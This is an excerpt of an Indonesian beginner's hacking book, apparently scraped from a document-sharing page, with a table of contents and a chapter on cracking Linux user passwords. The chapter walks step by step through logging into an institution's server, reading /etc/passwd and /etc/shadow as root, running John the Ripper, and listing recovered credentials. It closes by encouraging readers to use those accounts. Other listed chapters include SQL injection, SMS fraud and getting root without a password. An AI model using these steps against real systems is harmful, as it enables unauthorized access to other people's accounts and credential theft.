SPP Teknik Hacking Untuk Pemula

DAFTAR ISI
Kata Pengantar ....................................................................... v

Daftar Isi ............................................................................... vii
BAB 1 Pengenalan Hacker ............................. 1
BAB 2 Google Search ................................... 5

2.1 Google Hacking....................................................... 9
BAB 3 Mencari Tools Hacking ....................... 17
BAB 4 Bermain Exploit Auditor Boot CD dan

Metasploit Frame Work...................... 21
BAB 5 Bermain Logika Toko Buku Online ........ 25
BAB 6 Folder Locker ................................. 29
BAB 7 Hacking Guest Book .......................... 33
BAB 8 Teknik Menyusup ke Komputer

Orang Lain...................................... 39
8.1 Menjalankan Look@LAN ..................................... 40
vii
BAB 18
Hacking Password User
di Mesin Linux
Kali ini, kita akan melakukan teknik hacking password

di Linux. Teknik ini digunakan untuk mendapatkan
password user yang tercatat di sistem Linux, baik di
lingkungan jaringan maupun komputer stand alone.
Wooaaw… luar biasa!!! Kita bisa menggunakan user
orang lain untuk mengakses sistem.
Mungkin sebagian dari Anda pernah mencoba salah
satu software yang cukup terkenal di lingkungan
Unix/Linux ini. Software ini dinamakan John the
Ripper Password.
Oke, tanpa basa basi lagi, kita akan coba untuk mela-
kukannya. Pada kasus kali ini, saya akan mencoba
untuk menggunakan salah satu mesin server Linux
Redhat di suatu instansi yang menggunakan server
Linux sebagai proxy server internet mereka.
Tentunya langkah-langkah yang dilakukan di sini bisa
berbeda dengan yang Anda uji coba di tempat Anda.
91
1. Gunakan Google untuk mencari alamat paket
John the Ripper dengan kata kunci “john”.
Kata kunci “john”
Alamat ditemukan
Gambar 18.1 Memasukkan kata kunci di Google
2. Telnet ke server Linux, diasumsikan alamat IP

Address Server adalah 192.168.0.254.
Gambar 18.2 Telnet ke server target
92
3. Masukkan nama user dan password pada promp
login. Pada kasus ini diasumsikan saya memiliki
account di server.
User name dan

password
Gambar 18.3 Login ke server target
4. Pada promp shell Linux, gunakan wget untuk

men-download paket John the Ripper dengan me-
ngetikkan perintah:
Gambar 18.4 Men-download paket software

menggunakan wget
93
5. Ekstraklah paket software John the Ripper.
[syukrie@lp3iserv syukrie]$ tar xvfz john-
1.7.2.tar.gz
6. Pindah ke direktori john-1.7.2.

[syukrie@lp3iserv syukrie]$ cd john-1.7.2/src
7. Instalasi paket software John the Ripper meng-

gunakan perintah “make” dengan opsi “linux-
x86-sse2”.
[syukrie@lp3iserv src]$ make linux-x86-sse2
Proses instalasi akan terlihat seperti berikut ini.

ln -sf x86-sse.h arch.h
make ../run/john ../run/unshadow ../run/unafs
../run/unique \
JOHN_OBJS="DES_fmt.o DES_std.o DES_bs.o
BSDI_fmt.o MD5_fmt.o MD5_std.o BF_fmt.o
BF_std.o AFS_fmt.o LM_fmt.o batch.o bench.o
charset.o common.o compiler.o config.o
cracker.o crc32.o external.o formats.o
getopt.o idle.o inc.o john.o list.o loader.o
logger.o math.o memory.o misc.o options.o
params.o path.o recovery.o rpp.o rules.o
signals.o single.o status.o tty.o wordlist.o
unshadow.o unafs.o unique.o x86.o x86-sse.o"
make[1]: Entering directory
`/home/syukrie/john-1.7.2/src'
gcc -c -Wall -O2 -fomit-frame-pointer -
funroll-loops DES_fmt.c
funroll-loops DES_std.c
funroll-loops DES_bs.c
funroll-loops BSDI_fmt.c
funroll-loops MD5_fmt.c
94
funroll-loops MD5_std.c
funroll-loops BF_fmt.c
funroll-loops BF_std.c
funroll-loops AFS_fmt.c
funroll-loops LM_fmt.c
funroll-loops batch.c
funroll-loops bench.c
funroll-loops charset.c
funroll-loops common.c
funroll-loops compiler.c
funroll-loops config.c
funroll-loops cracker.c
funroll-loops crc32.c
funroll-loops external.c
funroll-loops formats.c
funroll-loops getopt.c
funroll-loops idle.c
funroll-loops inc.c
95
funroll-loops john.c
funroll-loops list.c
funroll-loops loader.c
funroll-loops logger.c
funroll-loops math.c
funroll-loops memory.c
funroll-loops misc.c
funroll-loops options.c
funroll-loops params.c
funroll-loops path.c
funroll-loops recovery.c
funroll-loops rpp.c
funroll-loops rules.c
funroll-loops signals.c
funroll-loops single.c
funroll-loops status.c
funroll-loops tty.c
funroll-loops wordlist.c
96
funroll-loops unshadow.c
funroll-loops unafs.c
funroll-loops unique.c
gcc -c x86.S
gcc -c x86-sse.S
gcc -s DES_fmt.o DES_std.o DES_bs.o BSDI_fmt.o
MD5_fmt.o MD5_std.o BF_fmt.o BF_std.o
AFS_fmt.o LM_fmt.o batch.o bench.o charset.o
common.o compiler.o config.o cracker.o crc32.o
external.o formats.o getopt.o idle.o inc.o
john.o list.o loader.o logger.o math.o
memory.o misc.o options.o params.o path.o
recovery.o rpp.o rules.o signals.o single.o
status.o tty.o wordlist.o unshadow.o unafs.o
unique.o x86.o x86-sse.o -o ../run/john
rm -f ../run/unshadow
ln -s john ../run/unshadow
rm -f ../run/unafs
ln -s john ../run/unafs
rm -f ../run/unique
ln -s john ../run/unique
make[1]: Leaving directory
Catatan:
Opsi ini dipakai sesuai dengan sistem operasi
yang digunakan, yakni Linux, untuk instalasi
paket John the Ripper. Jika Anda mengguna-
kan mesin FreeBSD, gunakan opsi “freebsd-
x86-sse2”
Untuk mengetahui penggunaan opsi ini, Anda
dapat ketikkan perintah “make” saja di shell.
97
Jika Anda ingin menginstalasi paket John the
Ripper untuk mesin yang general, gunakan
opsi “generic”. Namun opsi ini akan memper-
lambat proses instalasi.
8. Hapus sisa instalasi menggunakan perintah “make
clean” dengan opsi “linux-x86-sse2”.
[syukrie@lp3iserv src]$ make clean linux-x86-
sse2
rm -f ../run/john ../run/unshadow ../run/unafs
../run/unique ../run/john.bin ../run/john.com
../run/unshadow.com ../run/unafs.com
../run/unique.com ../run/john.exe
../run/unshadow.exe ../run/unafs.exe
../run/unique.exe
rm -f ../run/john.exe *.o *.bak core
rm -f detect bench generic.h arch.h sparc.h
tmp.s
rm -f DES_bs_s.c DES_bs_n.c DES_bs_a.c
cp /dev/null Makefile.dep
ln -sf x86-sse.h arch.h
make ../run/john ../run/unshadow ../run/unafs
../run/unique \
JOHN_OBJS="DES_fmt.o DES_std.o DES_bs.o
BSDI_fmt.o MD5_fmt.o MD5_std.o BF_fmt.o
BF_std.o AFS_fmt.o LM_fmt.o batch.o bench.o
charset.o common.o compiler.o config.o
cracker.o crc32.o external.o formats.o
getopt.o idle.o inc.o john.o list.o loader.o
logger.o math.o memory.o misc.o options.o
params.o path.o recovery.o rpp.o rules.o
signals.o single.o status.o tty.o wordlist.o
unshadow.o unafs.o unique.o x86.o x86-sse.o"
make[1]: Entering directory
funroll-loops DES_fmt.c
funroll-loops DES_std.c
98
funroll-loops DES_bs.c
funroll-loops BSDI_fmt.c
funroll-loops MD5_fmt.c
funroll-loops MD5_std.c
funroll-loops BF_fmt.c
funroll-loops BF_std.c
funroll-loops AFS_fmt.c
funroll-loops LM_fmt.c
funroll-loops batch.c
funroll-loops bench.c
funroll-loops charset.c
funroll-loops common.c
funroll-loops compiler.c
funroll-loops config.c
funroll-loops cracker.c
funroll-loops crc32.c
funroll-loops external.c
funroll-loops formats.c
99
funroll-loops getopt.c
funroll-loops idle.c
funroll-loops inc.c
funroll-loops john.c
funroll-loops list.c
funroll-loops loader.c
funroll-loops logger.c
funroll-loops math.c
funroll-loops memory.c
funroll-loops misc.c
funroll-loops options.c
funroll-loops params.c
funroll-loops path.c
funroll-loops recovery.c
funroll-loops rpp.c
funroll-loops rules.c
funroll-loops signals.c
funroll-loops single.c
100
funroll-loops status.c
funroll-loops tty.c
funroll-loops wordlist.c
funroll-loops unshadow.c
funroll-loops unafs.c
funroll-loops unique.c
gcc -c x86.S
gcc -c x86-sse.S
gcc -s DES_fmt.o DES_std.o DES_bs.o BSDI_fmt.o
MD5_fmt.o MD5_std.o BF_fmt.o BF_std.o
AFS_fmt.o LM_fmt.o batch.o bench.o charset.o
common.o compiler.o config.o cracker.o crc32.o
external.o formats.o getopt.o idle.o inc.o
john.o list.o loader.o logger.o math.o
memory.o misc.o options.o params.o path.o
recovery.o rpp.o rules.o signals.o single.o
status.o tty.o wordlist.o unshadow.o unafs.o
unique.o x86.o x86-sse.o -o ../run/john
rm -f ../run/unshadow
ln -s john ../run/unshadow
rm -f ../run/unafs
ln -s john ../run/unafs
rm -f ../run/unique
ln -s john ../run/unique
make[1]: Leaving directory
101
9. Ambil file passwd dan shadow di direktori /etc.
Perintah untuk berpindah dari user biasa ke
user root.
[syukrie@lp3iserv syukrie]$su –
Perintah untuk berpindah ke direktori john-

1.2.7/run.
[root @lp3iserv run]# cd
/home/syukrie/john-1.2.7/run
Perintah untuk membuat file mypasswd.

[root @lp3iserv run]# umask 077
[root @lp3iserv run]# unshadow /etc/passwd
/etc/shadow > mypasswd
10. Jalankan John the Ripper, berikut perintahnya.

[root @lp3iserv run]# ./john mypasswd
11. Lihat hasilnya, berikut perintahnya.

[root@lp3iserv run]# ./john --show mypasswd
Username dan Password yg ditemukan:

user “guest” password “guest”
user “tamu” password “tamu123”
Gambar 18.5 Hasil pencarian Username dan Password
102
Nah, sekarang kita dapat mengetahui password user
guest dan tamu seperti terlihat pada Gambar 18.5, asik
khan? ☺
Anda tentunya bisa menggunakan account yang sudah
Anda dapatkan password-nya tersebut. ☺
103
BAB 9 Mengenal Worm, Virus, dan Spyware..... 45
BAB 10 Mengenal Teknik Binder (Tool YAB) ...... 51
BAB 11 Penipuan SMS.................................. 57
BAB 12 Menjadi Root Tanpa Password (Melalui

Linux Single) Bagian 1 ....................... 61
BAB 13 Menjadi Root Tanpa Password

(Pencegahan) Bagian 2 ...................... 65
BAB 14 Snadboy Tool .................................. 67
BAB 15 SQL Injection .................................. 71
BAB 16 Membaca Password Windows XP........... 75
BAB 17 Office Password Recovery .................. 83
BAB 18 Hacking Password User di Mesin Linux ... 91
BAB 19 Google Hacking Bagian 2 ...................105
BAB 20 Analisa Keaslian Sebuah Foto .............113
BAB 21 Ancaman File JPEG..........................121
BAB 22 Manipulasi Input Nilai Bagian 1 ...........151
BAB 23 Manipulasi Input Nilai Bagian 2

(Achilles Tools)...............................157
viii

SPP Teknik Hacking Untuk Pemula

Diunggah oleh

Informasi Dokumen

Judul Asli

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

SPP Teknik Hacking Untuk Pemula

Diunggah oleh

Hak Cipta:

Format Tersedia

DAFTAR ISI

Kata Pengantar ....................................................................... v

BAB 2 Google Search ................................... 5

BAB 4 Bermain Exploit Auditor Boot CD dan

BAB 5 Bermain Logika Toko Buku Online ........ 25

BAB 6 Folder Locker ................................. 29

BAB 7 Hacking Guest Book .......................... 33

BAB 8 Teknik Menyusup ke Komputer

Kali ini, kita akan melakukan teknik hacking password

Kata kunci “john”

Gambar 18.1 Memasukkan kata kunci di Google

2. Telnet ke server Linux, diasumsikan alamat IP

Gambar 18.2 Telnet ke server target

User name dan

Gambar 18.3 Login ke server target

4. Pada promp shell Linux, gunakan wget untuk

Gambar 18.4 Men-download paket software

6. Pindah ke direktori john-1.7.2.

7. Instalasi paket software John the Ripper meng-

Proses instalasi akan terlihat seperti berikut ini.

Perintah untuk berpindah ke direktori john-

Perintah untuk membuat file mypasswd.

10. Jalankan John the Ripper, berikut perintahnya.

11. Lihat hasilnya, berikut perintahnya.

Username dan Password yg ditemukan:

Gambar 18.5 Hasil pencarian Username dan Password

BAB 10 Mengenal Teknik Binder (Tool YAB) ...... 51

BAB 11 Penipuan SMS.................................. 57

BAB 12 Menjadi Root Tanpa Password (Melalui

BAB 13 Menjadi Root Tanpa Password

BAB 14 Snadboy Tool .................................. 67

BAB 15 SQL Injection .................................. 71

BAB 16 Membaca Password Windows XP........... 75

BAB 17 Office Password Recovery .................. 83

BAB 18 Hacking Password User di Mesin Linux ... 91

BAB 19 Google Hacking Bagian 2 ...................105

BAB 20 Analisa Keaslian Sebuah Foto .............113

BAB 21 Ancaman File JPEG..........................121

BAB 22 Manipulasi Input Nilai Bagian 1 ...........151

BAB 23 Manipulasi Input Nilai Bagian 2

Anda mungkin juga menyukai